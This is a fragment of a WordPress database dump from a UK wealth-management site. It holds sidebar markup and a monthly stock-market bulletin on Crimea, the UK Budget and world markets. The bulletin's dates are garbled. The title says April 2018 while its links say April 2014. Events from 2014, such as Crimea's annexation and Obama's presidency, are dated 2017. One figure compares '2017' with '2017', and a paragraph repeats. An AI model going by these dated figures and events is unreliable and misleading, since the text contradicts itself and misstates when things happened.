</div>\r\n<p>&#13;\r\n								</div>\r\n<p>&#13;\r\n							</li>\r\n<p>&#13;\r\n														</p>\r\n<li>&#13;\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"../best-annuity-rates/\">&#13;\r\n										<img width=\"52\" height=\"43\" src=\"../wp-content/uploads/2013/02/Lighthouse-symbolism-image-photo1-e1364375976209.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"Annuity Rates\"/></a>&#13;\r\n								</div>\r\n<p>&#13;\r\n																</p>\r\n<div class=\"post-holder\"><p>&#13;\r\n									<a href=\"../best-annuity-rates/\">What Are The Best Annuity Rates in The UK</a>&#13;\r\n									</p>\r\n<div class=\"meta\">&#13;\r\n										March 21st, 2017									</div>\r\n<p>&#13;\r\n								</div>\r\n<p>&#13;\r\n							</li>\r\n<p>&#13;\r\n														</p>\r\n<li>&#13;\r\n<br />\r\n<div class=\"post-holder\"><p>&#13;\r\n									<a href=\"/\">The UK’s Income Protection Time Bomb</a>&#13;\r\n									</p>\r\n<div class=\"meta\">&#13;\r\n										September 10th, 2017									</div>\r\n<p>&#13;\r\n								</div>\r\n<p>&#13;\r\n							</li>\r\n<p>&#13;\r\n														</p>\r\n<li>&#13;\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"../g-day-impact-gender-directive-insurance/\">&#13;\r\n										<img width=\"52\" height=\"21\" src=\"../wp-content/uploads/2012/09/headline-image-composite-preview.jpg\" class=\"attachment-tabs-img wp-post-image\" alt=\"headline-image-composite-preview\"/></a>&#13;\r\n								</div>\r\n<p>&#13;\r\n																</p>\r\n<div class=\"post-holder\"><p>&#13;\r\n									<a href=\"../g-day-impact-gender-directive-insurance/\">G-day – Impact of the Gender Directive on Insurance</a>&#13;\r\n									</p>\r\n<div class=\"meta\">&#13;\r\n										September 18th, 2017									</div>\r\n<p>&#13;\r\n								</div>\r\n<p>&#13;\r\n							</li>\r\n<p>&#13;\r\n														</p>\r\n<li>&#13;\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"../what-does-a-wealth-managerdo/\">&#13;\r\n																			</a>&#13;\r\n								</div>\r\n<p>&#13;\r\n																</p>\r\n<div class=\"post-holder\"><p>&#13;\r\n									<a href=\"../what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\r\n									</p>\r\n<div class=\"meta\">&#13;\r\n										September 5th, 2017									</div>\r\n<p>&#13;\r\n								</div>\r\n<p>&#13;\r\n							</li>\r\n<p>&#13;\r\n													</ul>\r\n</div>\r\n<p>&#13;\r\n															</p>\r\n<div id=\"tab-recent\" class=\"tab tab_content\" style=\"display: none;\"><p>&#13;\r\n												</p>\r\n<ul class=\"news-list\">\r\n<li>&#13;\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"/\">&#13;\r\n																			</a>&#13;\r\n								</div>\r\n<p>&#13;\r\n																</p>\r\n<div class=\"post-holder\"><p>&#13;\r\n									<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\r\n									</p>\r\n<div class=\"meta\">&#13;\r\n										June 10th, 2017									</div>\r\n<p>&#13;\r\n								</div>\r\n<p>&#13;\r\n							</li>\r\n<p>&#13;\r\n														</p>\r\n<li>&#13;\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"../5-facts-know-annuities/\">&#13;\r\n																			</a>&#13;\r\n								</div>\r\n<p>&#13;\r\n																</p>\r\n<div class=\"post-holder\"><p>&#13;\r\n									<a href=\"../5-facts-know-annuities/\">5 Facts You Should Know About Annuities</a>&#13;\r\n									</p>\r\n<div class=\"meta\">&#13;\r\n										June 9th, 2017									</div>\r\n<p>&#13;\r\n								</div>\r\n<p>&#13;\r\n							</li>\r\n<p>&#13;\r\n														</p>\r\n<li>&#13;\r\n<br />\r\n<div class=\"post-holder\"><p>&#13;\r\n									<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\r\n									</p>\r\n<div class=\"meta\">&#13;\r\n										June 6th, 2017									</div>\r\n<p>&#13;\r\n								</div>\r\n<p>&#13;\r\n							</li>\r\n<p>&#13;\r\n														</p>\r\n<li>&#13;\r\n<br />\r\n<div class=\"post-holder\"><p>&#13;\r\n									<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\r\n									</p>\r\n<div class=\"meta\">&#13;\r\n										June 6th, 2017									</div>\r\n<p>&#13;\r\n								</div>\r\n<p>&#13;\r\n							</li>\r\n<p>&#13;\r\n														</p>\r\n<li>&#13;\r\n<br />\r\n<div class=\"post-holder\"><p>&#13;\r\n									<a href=\"../staging-date-social-advisors/\">When is your Staging Date Social Advisors</a>&#13;\r\n									</p>\r\n<div class=\"meta\">&#13;\r\n										June 6th, 2017									</div>\r\n<p>&#13;\r\n								</div>\r\n<p>&#13;\r\n							</li>\r\n<p>&#13;\r\n													</ul>\r\n</div>\r\n<p>&#13;\r\n														</div>\r\n<p>&#13;\r\n			</div>\r\n<p>&#13;\r\n		</div>\r\n<p>&#13;\r\n		</div>\r\n<div id=\"categories-3\" class=\"widget widget_categories\">\r\n<div class=\"heading\">\r\n<p>Post Categories</p>\r\n</div>\r\n<p><select name=\"cat\" id=\"cat\" class=\"postform\"><option value=\"-1\">Select Category</option><option class=\"level-0\" value=\"13\">Annuities  (2)</option><option class=\"level-0\" value=\"8\">Insurance Protection  (5)</option><option class=\"level-0\" value=\"5\">Investments  (3)</option><option class=\"level-0\" value=\"4\">Pensions  (9)</option><option class=\"level-0\" value=\"6\">Trusts  (1)</option><option class=\"level-0\" value=\"33\">Video  (4)</option><option class=\"level-0\" value=\"1\">Wealth Management  (17)</option></select><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */ var dropdown = document.getElementById(\"cat\"); function onCatChange() { if ( dropdown.options[dropdown.selectedIndex].value > 0 ) {\r\n			location.href = \"http://www.equalitywalk.org.uk/?cat=\"+dropdown.options[dropdown.selectedIndex].value;\r\n		}\r\n	}\r\n	dropdown.onchange = onCatChange;\r\n/* ]]]]><![CDATA[> */\r\n]]></script></a></div>\r\n<div id=\"social_links-widget-2\" class=\"widget social_links\">\r\n<div class=\"heading\">\r\n\r\nGet Social\r\n\r\n</div>\r\n<ul class=\"social-networks clearfix\">\r\n<ul class=\"social-networks clearfix\">\r\n 	<li class=\"rss\">\r\n<a class=\"rss\" href=\"http://feeds.feedburner.com/Equity SMART\" target=\"_blank\" rel=\"nofollow\">RSS</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nRSS\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks clearfix\">\r\n<ul class=\"social-networks clearfix\">\r\n 	<li class=\"twitter\">\r\n<a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"_blank\" rel=\"nofollow\">Twitter</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nTwitter\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n<div id=\"text-23\" class=\"widget widget_text\">\r\n<div class=\"textwidget\"><a href=\"https://my.leadpages.net/leadbox/14392e473f72a2%3A125d9572eb46dc/5699942098141184/\" target=\"_blank\"><img src=\"../WcBxvj97f6ImTTzlT4h-unuce5ZXpmlrf0JzFKpvBWJyilIlbrxaszuw0Y2NMVq3U1GZSw9_oe6GL-pXCIamWAg_s0.jpg\" /></a><script type=\"text/javascript\" src=\"../leadbox-690.js\"/></div>\r\n<p>&#13;\r\n		</div>\r\n</div>\r\n<p>&#13;\r\n		</div>\r\n<p>&#13;\r\n	</div>\r\n<p>&#13;\r\n				</p>\r\n<footer class=\"footer-area\">\r\n<div class=\"avada-row\"><p>&#13;\r\n			</p>\r\n<section class=\"columns columns-3\">\r\n<article class=\"col\">\r\n<div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">\r\n<p>Our Latest Posts</p>\r\n<ul>\r\n<li>&#13;\r\n				<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\r\n						</li>\r\n<p>&#13;\r\n					</p>\r\n<li>&#13;\r\n				<a href=\"../5-facts-know-annuities/\">5 Facts You Should Know About Annuities</a>&#13;\r\n						</li>\r\n<p>&#13;\r\n					</p>\r\n<li>&#13;\r\n				<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\r\n						</li>\r\n<p>&#13;\r\n					</p>\r\n<li>&#13;\r\n				<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\r\n						</li>\r\n<p>&#13;\r\n				</ul>\r\n<div style=\"clear:both;\"/></div>\r\n</article>\r\n<article class=\"col\">\r\n<div id=\"contact_info-widget-2\" class=\"footer-widget-col contact_info\">\r\n<p>Contact Info</p>\r\n<div class=\"contact-info-container\"><p>&#13;\r\n				</p>\r\n<p class=\"address\">Manchester &amp; London</p>\r\n<p>&#13;\r\n		&#13;\r\n				</p>\r\n<p class=\"phone\">Phone: </p>\r\n<p>&#13;\r\n		&#13;\r\n		&#13;\r\n		&#13;\r\n				</p>\r\n<p class=\"email\">Email: <a href=\"mailto:enquiries@equalitywalk.org.uk\">Click To Email</a></p>\r\n<p>&#13;\r\n		&#13;\r\n				&#13;\r\n				</div>\r\n<p>&#13;\r\n		</p>\r\n<div style=\"clear:both;\"/></div>\r\n</article>\r\n<article class=\"col\">\r\n<div style=\"clear:both;\"/></article>\r\n</section>\r\n</div>\r\n<p>				&#13;\r\n&#13;\r\n				</p>\r\n<article class=\"col last\"/></footer>\r\n</div>\r\n<p>&#13;\r\n	&#13;\r\n			</p>\r\n<footer id=\"footer\">\r\n<div class=\"avada-row\"/>&#13;\r\n	</footer>\r\n<p><!-- wrapper --><script type=\"text/javascript\" src=\"../maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\"><![CDATA[ jQuery(window).load(function() { jQuery( \'#wooslider-id-1\' ).flexslider2({namespace: \"wooslider-\" , animation: \'fade\', slideshowSpeed: 7000, animationSpeed: 600, slideshow: true, directionNav: true, keyboard: false, mousewheel: false, pausePlay: false, randomize: false, animationLoop: true, pauseOnAction: true, pauseOnHover: false, smoothHeight: false, touch: true, controlNav: true}); }); ]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.form.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */ var _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\",\"cached\":\"1\"}; /* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/swfupload.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */ var iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"}; /* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-includes/js/comment-reply.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\",\"mobile_nav_cart\":\"Shopping Cart\",\"page_smoothHeight\":\"false\",\"flex_smoothHeight\":\"false\",\"language_flag\":\"ICL_LANGUAGE_CODE\",\"infinite_blog_finished_msg\":\"<em>All posts displayed</em>\",\"infinite_blog_text\":\"<em>Loading the next set of posts...</em>\",\"portfolio_loading_text\":\"<em>Loading Portfolio Items...</em>\",\"faqs_loading_text\":\"<em>Loading FAQ Items...</em>\",\"order_actions\":\"Details\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script src=\"../wp-content/themes/Avada/js/main.js\" type=\"text/javascript\">// <![CDATA[\r\n<script type=\"text/javascript\" src=\"../wp-content/plugins/js_composer/assets/js/js_composer_front.js\"/></body></p>\r\n// ]]></script></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','April 2018 Stock Market Bulletin','Read about','inherit','closed','closed','','47-revision-v1','','','2017-09-21 17:32:08','2017-09-21 17:32:08','',47,'http://www.equalitywalk.org.uk/47-revision-v1',0,'revision','',0),(323,1,'2017-09-21 17:33:35','2017-09-21 17:33:35','<div id=\"wrapper\">\r\n<div id=\"main\" class=\"clearfix \">\r\n<div class=\"avada-row\">\r\n<div id=\"content\" class=\"full-width\" style=\"width: 100%;\">\r\n<div id=\"post-8121\" class=\"post-8121 post type-post status-publish format-standard has-post-thumbnail hentry category-investments category-wealth-management post\">\r\n<div class=\"post-content\">\r\n<div class=\"wpb_row vc_row-fluid\">\r\n<div class=\"vc_span12 wpb_column column_container\">\r\n\r\n\r\nWe started last month’s bulletin in the Crimea, with Russian troops in de facto control of the peninsula.\r\n<div class=\"wpb_text_column wpb_content_element \">\r\n<div class=\"wpb_wrapper\">\r\n\r\n&nbsp;\r\n\r\nWell, the Crimea is now part of Russia again and the collected denunciations and threatened sanctions of William Hague, John Kerry and the European foreign ministers will do nothing to change that.\r\n\r\n&nbsp;\r\n\r\nThe question now is what happens in the Eastern Ukraine? The area has a clear majority of Russian speakers and supporters and is no doubt on Mr Putin’s shopping list. Cue more denunciations and threats of sanctions…\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nThe question now is what happens in the Eastern Ukraine? The area has a clear majority of Russian speakers and supporters and is no doubt on Mr Putin’s shopping list. Cue more denunciations and threats of sanctions…\r\n\r\n&nbsp;\r\n\r\nNot that the rest of the world was peaceful in March. North and South Korea once again exchanged fire, this time over a disputed sea boundary. The North has warned that it may carry out a ‘new kind’ of nuclear test and seems to be becoming increasingly unpredictable as Kim Jong-un tightens his grip on power.\r\n\r\n&nbsp;\r\n\r\nIn the UK the big event was George Osborne’s Budget speech on Wednesday March 19<sup>th</sup>.\r\n\r\n&nbsp;\r\n\r\nThe Chancellor confounded those who had been expecting a ‘steady as you go Budget’ with a series of far reaching reforms to pensions and savings. It was easy to see the Chancellor setting out not only the battle lines for next year’s General Election, but also his own leadership manifesto in the event of a defeat for David Cameron.\r\n\r\n&nbsp;\r\n\r\nWorld stock markets generally had a disappointing month in March, with none of the major markets showing significant gains. Among the emerging markets India and Brazil both made good progress, gaining 6% and 7% respectively.\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n<div class=\"wpb_row vc_row-fluid\">\r\n\r\n&nbsp;\r\n<div class=\"vc_span12 wpb_column column_container\">\r\n\r\n&nbsp;\r\n<div class=\"wpb_wrapper\">\r\n<div class=\"wpb_text_column wpb_content_element \">\r\n\r\n&nbsp;\r\n<div class=\"wpb_wrapper\">\r\n\r\n&nbsp;\r\n<h1><span style=\"color: #0000ff;\"><b>United Kingdom</b></span></h1>\r\n&nbsp;\r\n\r\nAs noted above, the most important event in March was the Budget. The Chancellor declared that it would be a Budget for “makers, do-ers and savers” and proposed significant changes to the rules governing defined contribution pension schemes, allowing people much greater control over their own pensions and much more flexibility.\r\n\r\n&nbsp;\r\n\r\nThe Chancellor was, he said, “Prepared to trust the British people.”\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nThere were also major changes to the Individual Savings Account regime, with the annual limit raised to £15,000 and the limit on what can go into a cash ISA removed. They’ll now be called New ISAs, or NISAs. Cue several limp headlines in the papers…\r\n\r\n&nbsp;\r\n\r\nThis monthly bulletin isn’t really the place to go into all the implications of the Budget, but it <i>will</i> impact significantly on the financial planning of many of our clients. If you have any questions at all on what the Budget might mean for you, please don’t hesitate to contact us.\r\n\r\n&nbsp;\r\n\r\nMeanwhile, the debate on Scottish devolution rumbled on. The opinion polls currently have the ‘No’ vote on 52% compared to ‘Yes’ at 37%. For those who prefer a more reliable guide the bookmakers are convinced that independence won’t happen, and are betting accordingly.\r\n\r\n&nbsp;\r\n\r\nBad news for the ‘yes’ campaign came when 1 in 3 firms polled confirmed that they would consider re-locating head offices in the event of independence, and the Westminster government continues to rule out any prospect of a currency union with an independent Scotland. The poll is still 5½ months away, on September 18<sup>th</sup>\r\n\r\n&nbsp;\r\n\r\nTwo pieces of contrasting news in March illustrated the way the UK economy may be moving, both short and long-term. Supermarket group Morrison’s issued its second profits warning as it struggled to maintain market share, squeezed by Aldi and Lidl on one side and Tesco and Sainsbury’s on the other.\r\n\r\n&nbsp;\r\n\r\nMeanwhile King Digital (a company that very few readers of this bulletin will have heard of) became Britain’s most valuable publicly listed internet company when it floated on the New York stock exchange with a valuation of $7.6bn.\r\n\r\n&nbsp;\r\n\r\nWhat does King Digital do? It makes <i>Candy Crush</i> a game which 144m people play on their mobiles every day. That’s right, a hundred and forty-four million.\r\n\r\n&nbsp;\r\n\r\nThe FTSE-100 index had a disappointing month, falling by 3% to finish March at 6,598. At the end of the first quarter of 2017 it is down 2% on a year to date basis.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<div class=\"clearboth\"></div>\r\n<div class=\"demo-sep sep-single\" style=\"margin-top: 20px; margin-bottom: 20px;\"></div>\r\n&nbsp;\r\n<h1><span style=\"color: #0000ff;\"><b>Europe </b></span></h1>\r\n&nbsp;\r\n\r\nMarch saw contrasting fortunes for France and Italy, the second and third biggest Eurozone economies. In France the central bank predicted growth of just 0.2% for the first quarter – unchanged from an earlier estimate and down on the 0.3% growth in the final quarter of 2017.\r\n\r\n&nbsp;\r\n\r\nFrench industrial production also fell by 0.2% against expectations of 0.2% growth.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nMeanwhile Italy posted its biggest rise in industrial production for two years, up 1% in January and comfortably ahead of all the forecasts. This confirmed a slow but gradual recovery in the country, which finally came out of its longest post-war recession in the final quarter of 2017.\r\n\r\n&nbsp;\r\n\r\nThat said, industrial production remains 24% lower than in 2008, so there is still some way to go…\r\n\r\n&nbsp;\r\n\r\nFigures released for January showed that Germany had a €15bn trade surplus in January (up from a revised figure of €13.9bn for the previous month – and as a comparison the UK had a trade deficit of £22bn in the three months to December 2017).\r\n\r\n&nbsp;\r\n\r\nThe German inflation rate fell to 1% in March, a 3½ year low and down from 1.2% in February. There was also good news on unemployment which fell more than expected in March, as the German economy was boosted by relatively mild winter weather. The number unemployed fell by 12,000 – against analysts’ predictions of 7,500.\r\n\r\n&nbsp;\r\n\r\nOn the stock markets the German DAX index ended March 1% down at 9,556, while the French CAC-40 index was virtually unchanged at 4,391.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<div class=\"clearboth\"></div>\r\n<div class=\"demo-sep sep-single\" style=\"margin-top: 20px; margin-bottom: 20px;\"></div>\r\n&nbsp;\r\n<h1><span style=\"color: #0000ff;\"><b>USA</b></span></h1>\r\n&nbsp;\r\n\r\nIn the US the news was less good – the University of Michigan’s index of consumer sentiment fell, even though personal spending rose in February. It seems that Americans are spending now as they feel less confident about having the money to spend in the future.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nGDP growth was revised up to 2.6% for the final quarter of 2017 and jobless claims were down to a 4 month low. But manufacturing slowed in March and figures for February confirmed another near $40bn trade deficit – a figure the US Government seems powerless to do anything about.\r\n\r\n&nbsp;\r\n\r\nFor now President Obama appears to have won his battle with Congress, but the race to succeed him is gradually cranking up (with Hilary Clinton still the favourite). Expect to hear the words ‘lame’ and ‘duck’ around this time next year.\r\n\r\n&nbsp;\r\n\r\nNo lame ducks in the Zuckerberg household where Mark (not yet 30) has seen his fortune rise by $15bn over the past two years due to the strong performance of Facebook shares. I believe I was sceptical at the time of the flotation. So that would be a large slice of humble pie…\r\n\r\n&nbsp;\r\n\r\nThe Dow Jones index managed to stagger up by 1% in March, with the index closing at 16,458 – fractionally down on a year-to-date basis.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<div class=\"clearboth\"></div>\r\n<div class=\"demo-sep sep-single\" style=\"margin-top: 20px; margin-bottom: 20px;\"></div>\r\n&nbsp;\r\n<h1><span style=\"color: #0000ff;\"><b>Far East </b></span></h1>\r\n&nbsp;\r\n\r\nDespite the Chinese Government announcing a target of 7.5% growth for the next 12 months, several indicators released in March suggested that the Chinese economy is slowing down.\r\n\r\n&nbsp;\r\n\r\nIndustrial production for the first two months of 2017 was 8.6% up on the same period in 2017, but the expectation had been for 9.5% growth. This was the worst performance since 2009 and was partly due to strikes and industrial unrest in factories across China.\r\n\r\n&nbsp;\r\n\r\nConsumer spending also appears to be running out of steam, with the growth in retail sales in January and February the slowest for three years. That said it was up by 11.8% (a figure the West can’t even dream about) but expectations had been for 13.5%.\r\n\r\n&nbsp;\r\n\r\nWith investment in fixed assets by business also down, these are worrying signs for the Chinese economy, which will have a “drag” effect on the rest of region.\r\n\r\n&nbsp;\r\n\r\nPresident Li Keqiang spoke of “severe challenges” and there were suggestions that the Central Bank could announce a series of measures to inject some impetus into the economy.\r\n\r\n&nbsp;\r\n\r\nJapan’s economy also grew more slowly than expected in the fourth quarter of 2017, and again, both business investment and consumer spending fell below expectations.\r\n\r\n&nbsp;\r\n\r\nNo such worries in South Korea where the trade surplus for March improved to $4.19bn, up from $933m the previous month. Exports jumped to the second-highest figure on record due to higher demand from the USA and Europe.\r\n\r\n&nbsp;\r\n\r\nThe South Korean and Japanese stock markets were virtually unchanged at the end of March, whilst China fell by just 1% to 2,033. The Hong Kong market declined by 3% to 22,151 and is now down by 5% for the year as a whole.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<div class=\"clearboth\"></div>\r\n<div class=\"demo-sep sep-single\" style=\"margin-top: 20px; margin-bottom: 20px;\"></div>\r\n&nbsp;\r\n<h1><span style=\"color: #0000ff;\"><b>Emerging Markets </b></span></h1>\r\n&nbsp;\r\n\r\nIt’s hardly surprising that the Russian market fell significantly in March, given the threat of economic sanctions. The main index ended the month down 5% at 1,369 – down 9% on a year-to-date basis.\r\n\r\n&nbsp;\r\n\r\nHowever, figures for the last quarter of 2017 confirmed that the Russian economy was doing better than expected: it grew by 2% for the final three months of last year, against expectations of 1.3%.\r\n\r\n&nbsp;\r\n\r\nAs indicated above, there were much better returns from the other major emerging markets, with the Indian index up 6% in the month at 22,386 and the Brazilian index up 7% to 50,415 (although it is still down overall in 2017).\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h2><span style=\"color: #0000ff;\"><b>And finally…</b></span></h2>\r\n&nbsp;\r\n\r\nMany London estate agents had to be rushed to hospital with acute excitement (or greed) in March, when a study was published suggesting that the average central London flat will cost £36m by the year 2050.\r\n\r\n&nbsp;\r\n\r\nLondon Central Portfolio launched a £100m fund to buy flats in ‘prime’ areas of London (that is, the area surrounding Hyde Park, from Notting Hill to Pimlico) confident that its prediction of 9% a year annual growth would become a reality, with or without the help of Russian oligarchs.\r\n\r\n&nbsp;\r\n\r\nSadly none of us in the office own a flat in Notting Hill or moonlights as an oligarch, so we’ll back at the beginning of May with the next monthly bulletin.\r\n\r\n&nbsp;\r\n\r\nIn the meantime we’ll be happy to answer your questions on the Budget or any other aspect of financial planning.\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class=\"meta-info\">\r\n\r\n&nbsp;\r\n<div class=\"vcard\">By <span class=\"sep\">|</span>Categories: <a title=\"View all posts in Investments\" href=\"../category\" rel=\"category tag\">Investments</a>, <a title=\"View all posts in Wealth Management\" href=\"../category/wealth-management/\" rel=\"category tag\">Wealth Management</a><span class=\"sep\">|</span><span class=\"meta-tags\">Tags: </span><span class=\"sep\">|</span><a title=\"Comment on April 2014 Stock Market Bulletin\" href=\"../april-2014-stock-market-bulletin/\">0 Comments</a></div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class=\"share-box\">\r\n\r\n&nbsp;\r\n<h4></h4>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"facebook\"><a href=\"http://www.facebook.com/sharer.php?m2w&amp;s=100&amp;p[url]=http://www.equalitywalk.org.uk/april-2014-stock-market-bulletin/&amp;p[title]=April%202014%20Stock%20Market%20Bulletin\" target=\"_blank\" rel=\"nofollow\">\r\nFacebook\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nFacebook\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"twitter\"><a href=\"http://twitter.com/home?status=April+2014+Stock+Market+Bulletin%20http://www.equalitywalk.org.uk/april-2014-stock-market-bulletin/\" target=\"_blank\" rel=\"nofollow\">\r\nTwitter\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nTwitter\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"linkedin\"><a href=\"http://linkedin.com/shareArticle?mini=true&amp;url=http://www.equalitywalk.org.uk/april-2014-stock-market-bulletin/&amp;title=April%202014%20Stock%20Market%20Bulletin\" target=\"_blank\" rel=\"nofollow\">\r\nLinkedIn\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div class=\"holder\">\r\n\r\n&nbsp;\r\n\r\nLinkedIn\r\n\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;</li>\r\n</ul>\r\n</ul>\r\n&nbsp;\r\n<ul class=\"social-networks social-networks-dark\">\r\n<ul class=\"social-networks social-networks-dark\">\r\n 	<li class=\"reddit\"><a href=\"http://reddit.com/submit?url=http://www.equalitywalk.org.uk/april-2014-stock-market-bulletin/&amp;title=April%202014%20Stock%20Market%20Bulletin\" target=\"_blank\" rel=\"nofollow\">\r\nReddit\r\n</a>\r\n<div class=\"popup\">\r\n\r\n&nbsp;\r\n<div 